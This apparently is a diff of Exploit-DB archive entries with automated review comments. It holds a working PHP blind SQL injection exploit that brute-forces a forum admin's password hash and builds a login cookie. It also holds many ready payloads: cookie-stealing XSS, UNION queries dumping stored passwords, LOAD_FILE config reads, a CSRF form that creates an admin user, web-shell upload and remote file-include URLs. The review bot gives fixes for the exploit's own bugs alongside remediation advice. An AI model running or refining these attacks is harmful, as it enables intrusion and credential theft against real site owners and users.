-P[ip:port]: " a proxy
-t[n]: adjust query timeout (default: 10)
-b[n]: " the delay for benchmark()
Example:
php '.$argv[0].' localhost /wbblite/ -P1.1.1.1:80
" " localhost / -u2 -p81
" " localhost /forum/ -t15 -b20000000
" " localhost / -t15 -b20000000
---------------------------------------------------------------------------------
');
die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
}
$host=$argv[1];
$path=$argv[2];
$uid=1;
$port=80;
$timeout=10;
$proxy="";
$b=100000000;
for ($i=3; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
if ($temp=="-t")
{
$timeout=(int) str_replace("-t","",$argv[$i]);
}
if ($temp=="-b")
{
$b=(int) str_replace("-b","",$argv[$i]);
}
if ($temp=="-u")
{
$uid=(int) str_replace("-b","",$argv[$i]);
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$data ="wbb_userid=%27";
$data.="&-246470575=1";
$data.="&-73279541=1";
$packet ="POST ".$p." HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Cookie: wbb_userpassword=0;\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (eregi("mysql error number:",$html)){
echo "vulnerable...\n";
$temp=explode("users LEFT JOIN",$html);$temp2=explode("FROM ",$temp[0]);$prefix=$temp2[1];
echo "prefix -> ".$prefix."\n";
}
else
{die("not vulnerable...");}
$chars[0]=0;//null
$chars=array_merge($chars,range(48,57)); //numbers
$chars=array_merge($chars,range(97,102));//a-f letters
$j=1;$password="";
while (!strstr($password,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
if (in_array($i,$chars))
{
$sql="9999999'/**/OR/**/".$prefix."users.userid=$uid/**/AND/**/(IF((ASCII(SUBSTRING(password,".$j.",1))=".$i."),BENCHMARK(".$b.",CHAR(0)),-1))/**/LIMIT/**/1/*";
$sql=urlencode($sql);
$data ="wbb_userid=$sql";
$data.="&-246470575=1";
$data.="&-73279541=1";
$packet ="POST ".$p." HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Cookie: wbb_userpassword=0;\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (eregi("mysql error number:",$html)) {
die($html."\n\n"."debug: you have to modify sql code injected, it seems a different version...");
}
usleep(20000);
$starttime=time();
echo "starttime -> ".$starttime."\r\n";
sendpacketii($packet);
$endtime=time();
echo "endtime -> ".$endtime."\r\n";
$difftime=$endtime - $starttime;
echo "difftime -> ".$difftime."\r\n";
if ($difftime > $timeout) {$password.=chr($i);echo "password -> ".$password."[???]\r\n";sleep(2);break;}
}
if ($i==255) {
die("\nExploit failed...");
}
}
$j++;
}
function is_hash($hash)
{
if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
else {return false;}
}
if (is_hash($password)) {
print_r('
--------------------------------------------------------------------------
cookie -> wbb_userid='.$uid.'; wbb_userpassword='.$hash.';
--------------------------------------------------------------------------
');
if ($uid==1) {
echo "done, but... to have access to admin panel you need to break the hash\n";
}
}
else {
echo "exploit failed...";
}
?>
# milw0rm.com [2006-11-23]
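Review bot: two logic bugs are carried over unchanged in both copies and should be fixed while the file is rewritten. In the option loop the `-u` branch strips the wrong prefix, `$uid=(int) str_replace("-b","",$argv[$i]);`, so `-u2` is cast to 0 and the default admin target is never overridden; it should strip `"-u"`. In the success report, `cookie -> wbb_userid='.$uid.'; wbb_userpassword='.$hash.';` references `$hash`, which is never assigned anywhere in the script (the recovered value lives in `$password`, the variable `is_hash()` is called on), so the printed cookie value is always empty; use `$password` there. Minor: `is_hash()` anchors only the start of the pattern (`^[a-f0-9]{32}`) and relies on `trim()` to drop the terminating `chr(0)` the brute-force loop appends, which works but is worth a comment.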

@ -19,6 +19,8 @@
#
#
#
# Exploit-DB Note:
# A PoC: form.php?id=1%20and%20 1=1
##########################################
##############
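Review bot: the added PoC `form.php?id=1%20and%20 1=1` mixes an encoded space (`%20`) with a literal space before `1=1`, which looks like a typo; it should read `id=1%20and%201=1`. A true-condition probe on its own also does not demonstrate injection, since an unaffected page returns the same content for `id=1`; pair it with the false case `id=1%20and%201=2` and note that the two responses must differ for the test to mean anything.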

@ -1,72 +0,0 @@
----------------------------------------------------------
openSIS <= 5.2 (ajax.php) PHP Code Injection Vulnerability
----------------------------------------------------------
[-] Software Link:
http://www.opensis.com/
[-] Affected Versions:
All versions from 4.5 to 5.2.
[-] Vulnerability Description:
The vulnerable code is located in the /ajax.php script:
86. if(clean_param($_REQUEST['modname'],PARAM_NOTAGS))
87. {
88. if($_REQUEST['_openSIS_PDF']=='true')
89. ob_start();
90. if(strpos($_REQUEST['modname'],'?')!==false)
91. {
92. $vars = substr($_REQUEST['modname'],(strpos($_REQUEST['modname'],'?')+1));
93. $modname = substr($_REQUEST['modname'],0,strpos($_REQUEST['modname'],'?'));
94.
95. $vars = explode('?',$vars);
96. foreach($vars as $code)
97. {
98. $code = decode_unicode_url("\$_REQUEST['".str_replace('=',"']='",$code)."';");
99. eval($code);
100. }
101. }
User input passed through the "modname" request variable is not properly sanitized before being used in
a call to the eval() function at line 99. This can be exploited to inject and execute arbitrary PHP code.
[-] Solution:
As of December 5th, 2013 the only solution is this patch: http://sourceforge.net/p/opensis-ce/code/1009
[-] Disclosure Timeline:
[04/12/2012] - Issue reported to http://sourceforge.net/p/opensis-ce/bugs/59/
[28/12/2012] - Vendor contacted, replied that the next version will fix the issue
[12/01/2013] - CVE number requested
[14/01/2013] - CVE number assigned
[26/04/2013] - Version 5.2 released, however the issue isn't fixed yet
[12/05/2013] - Vendor contacted again
[15/05/2013] - Issue temporarily fixed in the SVN repository (r1009)
[04/12/2013] - After one year still no official solution available
[-] CVE Reference:
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2013-1349 to this vulnerability.
[-] Credits:
Vulnerability discovered by Egidio Romano.
[-] Original Advisory:
http://karmainsecurity.com/KIS-2013-10
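Review bot: this hunk (`@ -1,72 +0,0 @@`) deletes the whole openSIS advisory, including the CVE-2013-1349 reference and the only documented fix (SVN r1009), and no replacement file is visible in this diff; if the advisory is being re-filed under another id, the commit message should say where it went. On the substance, the vulnerable pattern at lines 98-99, where `$code` is built from `modname` and passed to `eval($code)`, is fixed by assigning the parsed key/value pairs directly (split each `$code` on `=` and set `$_REQUEST[$key] = $value`) so request data never reaches `eval()`; the linked r1009 patch is the vendor's interim version of that change.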

platforms/php/webapps/30105.txt Executable file
@ -0,0 +1,37 @@
# Exploit Title: Wordpress Plugin: Wordpress Download Manager Free & Pro
Persistent Cross Site Scripting
# Google Dork:
# Date: 12-06-2013
# Exploit Author: IT Nerdbox
# Vendor Homepage: http://www.wpdownloadmanager.com # Software Link:
http://downloads.wordpress.org/plugin/download-manager.zip
# Version: v3.3.8
# Tested on: Wordpress 3.7.1 on Linux CentOS # CVE : N/A
When creating a new download package you need to enter a title, description
and the file(s) that you want to be available for download. The title input
field is not sanitized and therefor vulnerable to persistent cross site
scripting. The payload used is <input onmouseover=prompt(document.cookie)>
More information, including screenshots, can be found at:
http://www.nerdbox.it/wordpress-download-manager-xss/
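Review bot: the header block has been re-wrapped by a mail client: the title spans two lines, `# Vendor Homepage: http://www.wpdownloadmanager.com # Software Link:` and `# Tested on: Wordpress 3.7.1 on Linux CentOS # CVE : N/A` each carry two fields on one line, and the Google Dork field is empty, so metadata parsing of this file will be unreliable; restore one `# Field:` per line. The advisory names no fix; the plugin-side mitigation is escaping the package title on output (`esc_html()` / `esc_attr()`) and validating it on save, which is worth stating for users on v3.3.8 until a patched release exists.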

platforms/php/webapps/30107.txt Executable file
@ -0,0 +1,171 @@
###########################################################
[~] Exploit Title: Ovidentia 7.9.6 Multiple Vulnerabilities
[~] Author: sajith
[~] version: Ovidentia 7.9.6
[~]Vendor Homepage: http://www.ovidentia.org/
[~] vulnerable app link:http://www.ovidentia.org/telecharger
###########################################################
[1]SQL injection vulnerability
Log into admin panel and access delegate functionality > managing
administrators where &id parameter (shown below link) is vulnerable to sql
injection
http://127.0.0.1/cms/ovidentia-7-9-6/index.php?tg=delegat&idx=mem&id=1
POC by sajith shetty:
request:
GET /cms/ovidentia-7-9-6/index.php?tg=delegat&idx=mem&id=1%27 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101
Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Cookie: OV146706993=62t0i0e1mc2r0r4elhdm967h95; bab_Tree.myTreeView=
response:
style="cursor: pointer"
onclick="s=document.getElementById('babParam_1_5_0');
s.style.display=='none'?s.style.display='':s.style.display='none'">[+]</span><div
style="display: none; background-color: #EEEECC"
id="babParam_1_5_0">[C:\xampp\htdocs\cms\ovidentia-7-9-6\ovidentia\index.php]</div>)
<i>called at</i>
[C:\xampp\htdocs\cms\ovidentia-7-9-6\index.php:25]</pre><h2>Can't execute
query : <br><pre>select * from bab_dg_admin where id_dg=1'</pre></h2>
<p><b>Database Error: You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right syntax
to use near ''' at line 1</b></p>
<p>This script cannot continue, terminating.
[2]CSRF vulnerability
log into the admin portal and access the create user functionality
http://127.0.0.1/cms/ovidentia-7-9-6/index.php?tg=users&idx=Create&pos=A&grp=
using csrf vulnerability it was possible to add new user.
<head>
<title>POC by sajith shetty</title>
</head>
<body>
<form action="http://127.0.0.1/cms/ovidentia-7-9-6/index.php"
enctype="multipart/form-data" method="post" id="formid">
<input type="hidden" name="user[sendpwd]" value="0" />
<input type="hidden" name="user[password1]" value="P@ssw0rd1" />
<input type="hidden" name="user[notifyuser]" value="0" />
<input type="hidden" name="grp" value="" />
<input type="hidden" name="idx" value="Create" />
<input type="hidden" name="user[password2]" value="P@ssw0rd1" />
<input type="hidden" name="user[givenname]" value="POC" />
<input type="hidden" name="pos" value="A" />
<input type="hidden" name="widget_filepicker_job_uid[]"
value="52a35b7fac6c9" />
<input type="hidden" name="user[email]" value="poctester@xyz.com" />
<input type="hidden" name="user[nickname]" value="1234" />
<input type="hidden" name="user[sn]" value="test" />
<input type="hidden" name="tg" value="users" />
<input type="hidden" name="user[mn]" value="tester" />
</form>
<script>
document.getElementById('formid').submit();
</script>
</body>
</html>
[3]Reflected XSS
http://127.0.0.1/cms/ovidentia-7-9-6/index.php/foo"><img src=x
onerror=prompt(1);>
request:
GET
/cms/ovidentia-7-9-6/index.php/foo%22%3E%3Cimg%20src=x%20onerror=prompt(1);%3E
HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101
Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Cookie: OV146706993=62t0i0e1mc2r0r4elhdm967h95
response:
<div id="ovidentia_headbottomright">
<div>
<!-- Icons based on Monoblack (look for Gnome by Matteo Landi) :
http://linux.softpedia.com/developer/Matteo-Landi-3851.html -->
<a href="http://127.0.0.1/cms/ovidentia-7-9-6/foo"><img src=x
onerror=prompt(1);>" title="Home"><img
src="skins/theme_default/images/home-reflect.gif" alt="Home" title="Home"
/></a> 
<!-- Script OVML: show the list of the buttons of quick accesses to
functions by leaning on entries available in user section -->
[4]Stored xss
log into the admin portal and access mail functionlity and create new
domain using link below
http://127.0.0.1/cms/ovidentia-7-9-6/index.php?tg=maildoms&idx=create&userid=0&bgrp=y
here Name & Description field is vulnerable to stored XSS .payload:"><img
src=x onerror=prompt(1);>
request:
POST /cms/ovidentia-7-9-6/index.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101
Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer:
http://127.0.0.1/cms/ovidentia-7-9-6/index.php?tg=maildoms&idx=create&userid=0&bgrp=y
Cookie: OV146706993=62t0i0e1mc2r0r4elhdm967h95
Content-Type: application/x-www-form-urlencoded
Content-Length: 301
tg=maildoms&idx=list&userid=0&bgrp=y&adddom=add&dname=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28111%29%3B%3E&description=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28222%29%3B%3E&accessmethod=pop3&inmailserver=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28333%29%3B%3E&inportserver=110&submit=Dom%E4ne+hinzuf%FCgen
response:
<td>Registrierte User</td>
</tr>
<tr class="BabSiteAdminFontBackground">
<td>
<a href="
http://127.0.0.1/cms/ovidentia-7-9-6/index.php?tg=maildom&idx=modify&item=2&userid=0&bgrp=y">"><img
src=x onerror=prompt(111);></a>
</td>
<td>"><img src=x onerror=prompt(222);></td>
<td>Registrierte User</td>
</tr>
</table>
</td>
</tr>
</table>
<br>
</div>
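Review bot: in section [1] the error page echoes the raw query (`select * from bab_dg_admin where id_dg=1'`), the absolute install path under `C:\xampp\htdocs\...` and a debug call stack; that is a separate finding (verbose error and debug output enabled) and should be listed as such, because the fix is both parameterizing the `id` lookup and disabling debug output in production. In section [2] the CSRF form has a closing `</html>` with no opening `<html>`, and in section [4] the sentence `here Name & Description field is vulnerable to stored XSS .payload:` runs straight into the payload; a line break before `payload:` would make the file readable. For [3] and [4] the fix is output encoding of the PATH_INFO-derived URL and of the mail-domain name/description fields, which the advisory does not state.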

platforms/php/webapps/30108.txt Executable file
@ -0,0 +1,48 @@
#Title : Wordpress Templatic Themes CSRF File Upload Vulnerability [Monetize Uploader]
#Author : Jje Incovers
#Date : 08/12/2013
#Category : Web Applications
#Type : PHP
#Vendor : http://templatic.com/
#Download : http://templatic.com/wordpress-themes-store/
#Tested : Mozila, Chrome, Opera -> Windows & Linux
#Vulnerabillity : CSRF
#Dork :
inurl:/wp-content/themes/Realestate/
inurl:/wp-content/themes/dailydeal/
inurl:/wp-content/themes/nightlife/
inurl:/wp-content/themes/5star/
inurl:/wp-content/themes/specialist/
CSRF File Upload Vulnerability
Exploit & POC : http://site-target/wp-content/themes/Realestate/Monetize/general/upload-file.php
<html>
<body>
<center>
<form method="post" enctype="multipart/form-data" action="http://site-target/wp-content/themes/Realestate/Monetize/general/upload-file.php
">
<br>
</br>
<input name="uploadfile[]" type="file" />
<br>
<input type="submit" value="upload" />
</form>
</center>
</body>
</html>
File Access :
http://site-target/wp-content/themes/Realestate/images/tmp/your_shell.php
Note :
Script CSRF equate with dork you use
########################################
#Greetz : SANJUNGAN JIWA , Exploit - DB , 1337 Day
#Thanks : Akira | Xie Log | - SANJUNGAN JIWA
########################################
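Review bot: the finding is labelled CSRF, but the PoC is a plain HTML form posting a file to `upload-file.php` with no session cookie or nonce involved, which is unauthenticated arbitrary file upload rather than CSRF; the title should say so because the remediation differs (an authentication check and `wp_verify_nonce()` on the upload handler, restricting accepted file types, and serving `images/tmp` as non-executable). The form `action` attribute is also broken across two lines (`...upload-file.php` followed by `">`), `<br>` / `</br>` is not valid HTML, and `your_shell.php` in the file-access URL is a placeholder and should be marked as one.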

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24236/info
Particle Gallery is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
This issue affects Particle Gallery 1.0.1 and prior versions.
http://www.example.com/apppath/search.php?user=admin&order=>"><ScRiPt%20%0a%0d>alert(1111110)%3B</ScRiPt>

platforms/php/webapps/30111.txt Executable file
@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/24249/info
myBloggie is prone to an SQL-injection vulnerability.
An attacker can exploit this issue by manipulating the SQL query logic to carry out unauthorized actions on the underlying database.
This issue affects myBloggie 2.1.6 and earlier.
http://www.example.com/apppath/index.php?mode=viewuser&cat_id='
http://www.example.com/apppath/index.php?mode=viewuser&month_no=4&year="

platforms/php/webapps/30112.txt Executable file
@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/24253/info
PHP JackKnife is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
http://www.example.com/PHPJK/G_Display.php?iCategoryUnq=-1/**/union/**/select/**/1,2,Password,4,5,6/**/from/**/Accounts/*
Read database credentials:
http://www.example.com/PHPJK/G_Display.php?iCategoryUnq=-1/**/union/**/select/**/1,2,LOAD_FILE(0x2F7573722F6C6F63616C2F617061636865322F6874646F63732F5048504A4B2F436F6E66696
775726174696F6E732F5048504A4B5F436F6E6669672E706870),4,5,6/**/from/**/Accounts/*
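Review bot: the `LOAD_FILE()` URL has been split across two lines (`...436F6E66696` / `775726174696F6E732F...`) by line wrapping, so the hex literal is broken in the file as committed; keep it on one line. The second PoC also only works when the database account holds the MySQL FILE privilege and the web root is readable by mysqld, which the text should state, since revoking FILE from the application's account is the mitigation alongside parameterizing `iCategoryUnq`.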

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/24253/info
PHP JackKnife is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
http://www.example.com/PHPJK/Search/DisplayResults.php?DOMAIN_Link=&iSearchID=-1+UNION+SELECT+1,1,1,1,Login,1,Password,1,1,1,1,1,1,1+FROM+Accounts/*

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/24253/info
PHP JackKnife is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
http://www.example.com/PHPJK/UserArea/Authenticate.php?sUName=&lt;/textarea&gt;'"><script>alert(document.cookie)</script>

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/24253/info
PHP JackKnife is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
http://www.example.com/PHPJK/UserArea/NewAccounts/index.php?sAccountUnq=&lt;/textarea&gt;'"><script>alert(document.cookie)</script>

platforms/php/webapps/30116.txt Executable file
@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/24253/info
PHP JackKnife is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
http://www.example.com/PHPJK/G_Display.php?iCategoryUnq=&lt;/textarea&gt;'"><script>alert(document.cookie)</script>
http://www.example.com/PHPJK/G_Display.php?iDBLoc=&lt;/textarea&gt;'"><script>alert(document.cookie)</script>
http://www.example.com/PHPJK/G_Display.php?iTtlNumItems=&lt;/textarea&gt;'"><script>alert(document.cookie)</script>
http://www.example.com/PHPJK/G_Display.php?&iNumPerPage=&lt;/textarea&gt;'"><script>alert(document.cookie)</script>
http://www.example.com/PHPJK/G_Display.php?sSort=&lt;/textarea&gt;'"><script>alert(document.cookie)</script>

platforms/php/webapps/30118.txt Executable file
@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/24266/info
'Prototype of an PHP application' is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application.
An attacker may leverage these issues to execute an arbitrary remote file containing malicious script code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system. Other attacks are also possible.
This issue affects 'Prototype of an PHP application' 0.1.
http://example.com/script/gestion/index.php?path_inc=[shell]
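Review bot: this and the following hunks (all from BID 24266, all for the same 0.1 release) differ only in the script path after `http://example.com/script/`; one file listing the affected paths would be easier to maintain than eleven near-identical files, and the `[shell]` token should be documented as a placeholder. The root cause is a single include built from the `path_inc` request parameter, so the fix is one change (do not derive the include path from user input, with `allow_url_include` off as defence in depth), not one per script; the seventh URL, `http://example.com/script//ident/index.php`, also carries a doubled slash that looks like a typo.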

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24266/info
'Prototype of an PHP application' is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application.
An attacker may leverage these issues to execute an arbitrary remote file containing malicious script code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system. Other attacks are also possible.
This issue affects 'Prototype of an PHP application' 0.1.
http://example.com/script/ident/identification.php?path_inc=[shell]

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24266/info
'Prototype of an PHP application' is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application.
An attacker may leverage these issues to execute an arbitrary remote file containing malicious script code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system. Other attacks are also possible.
This issue affects 'Prototype of an PHP application' 0.1.
http://example.com/script/ident/disconnect.php?path_inc=[shell]

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24266/info
'Prototype of an PHP application' is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application.
An attacker may leverage these issues to execute an arbitrary remote file containing malicious script code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system. Other attacks are also possible.
This issue affects 'Prototype of an PHP application' 0.1.
http://example.com/script/ident/loginliste.php?path_inc=[shell]

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24266/info
'Prototype of an PHP application' is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application.
An attacker may leverage these issues to execute an arbitrary remote file containing malicious script code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system. Other attacks are also possible.
This issue affects 'Prototype of an PHP application' 0.1.
http://example.com/script/ident/loginmodif.php?path_inc=[shell]

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24266/info
'Prototype of an PHP application' is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application.
An attacker may leverage these issues to execute an arbitrary remote file containing malicious script code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system. Other attacks are also possible.
This issue affects 'Prototype of an PHP application' 0.1.
http://example.com/script//ident/index.php?path_inc=[shell]

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24266/info
'Prototype of an PHP application' is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application.
An attacker may leverage these issues to execute an arbitrary remote file containing malicious script code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system. Other attacks are also possible.
This issue affects 'Prototype of an PHP application' 0.1.
http://example.com/script/ident/ident.inc.php?path_inc=[shell]

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24266/info
'Prototype of an PHP application' is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application.
An attacker may leverage these issues to execute an arbitrary remote file containing malicious script code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system. Other attacks are also possible.
This issue affects 'Prototype of an PHP application' 0.1.
http://example.com/script/menu/menuprincipal.php?path_inc=[shell]

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24266/info
'Prototype of an PHP application' is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application.
An attacker may leverage these issues to execute an arbitrary remote file containing malicious script code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system. Other attacks are also possible.
This issue affects 'Prototype of an PHP application' 0.1.
http://example.com/script/param/param.inc.php?path_inc=[shell]

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24266/info
'Prototype of an PHP application' is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application.
An attacker may leverage these issues to execute an arbitrary remote file containing malicious script code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system. Other attacks are also possible.
This issue affects 'Prototype of an PHP application' 0.1.
http://example.com/script/plugins/phpgacl/admin/index.php?path_inc=[shell]

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24266/info
'Prototype of an PHP application' is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application.
An attacker may leverage these issues to execute an arbitrary remote file containing malicious script code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system. Other attacks are also possible.
This issue affects 'Prototype of an PHP application' 0.1.
http://example.com/script/index.php?path_inc=[shell]

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24266/info
'Prototype of an PHP application' is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application.
An attacker may leverage these issues to execute an arbitrary remote file containing malicious script code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system. Other attacks are also possible.
This issue affects 'Prototype of an PHP application' 0.1.
http://example.com/script/common.inc.php?path_inc=[shell]

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24269/info
Buttercup WFM (Web File Manager) is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
This issue is reported to affect the Buttercup WFM - May 2007 edition. Other versions could also be affected.
http://www.example.com/index.php?title=%3Cscript%3Ealert(1)%3C/script%3E

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/24270/info
Evenzia CMS is prone to a cross-site script vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/includes/send.inc.php/>'>><script>alert(document.cookie)</script>

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24276/info
PHP Live! is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
PHP Live! 3.2.2 is vulnerable to this issue; other versions may also be affected.
http://www.example.com/phplive/chat.php?sid=<script>alert(123);</script>

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24276/info
PHP Live! is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
PHP Live! 3.2.2 is vulnerable to this issue; other versions may also be affected.
http://www.example.com/phplive/help.php?LANG[DEFAULT_BRANDING]=<script>alert(123);</script> http://www.example.com/phplive/help.php?PHPLIVE_VERSION=<script>alert(123);</script>
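Review bot: two PoC URLs have been joined on one line (`.../help.php?LANG[DEFAULT_BRANDING]=...` and `.../help.php?PHPLIVE_VERSION=...`), so the file as committed reads as a single malformed URL; put each on its own line as the sibling BID 24276 files do. Both entries point at the same root cause, `register_globals`-style overwriting of template variables via the query string, which is worth stating since the fix (initialise `LANG` and `PHPLIVE_VERSION` server-side and encode on output) is shared.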

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24276/info
PHP Live! is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
PHP Live! 3.2.2 is vulnerable to this issue; other versions may also be affected.
